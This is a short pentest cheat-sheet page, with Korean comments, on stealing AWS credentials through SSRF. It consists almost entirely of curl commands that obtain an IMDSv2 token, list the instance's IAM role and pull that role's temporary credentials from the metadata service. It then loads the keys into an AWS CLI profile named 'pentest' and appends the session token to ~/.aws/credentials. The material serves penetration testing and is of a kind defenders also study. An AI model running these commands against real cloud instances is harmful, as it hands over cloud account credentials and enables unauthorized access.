Credential theft via SSRF
Abuse
# 토큰 발급
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# IAM Role 식별
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Role에 대한 크리덴셜 획득
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/'<iam-role>'
# 획득한 크리덴셜 저장 및 이용
aws configure --profile pentest
- access-key
- secret-key
echo "aws_session_token = '<token>'" >> ~/.aws/credentialsDemo

References
Last updated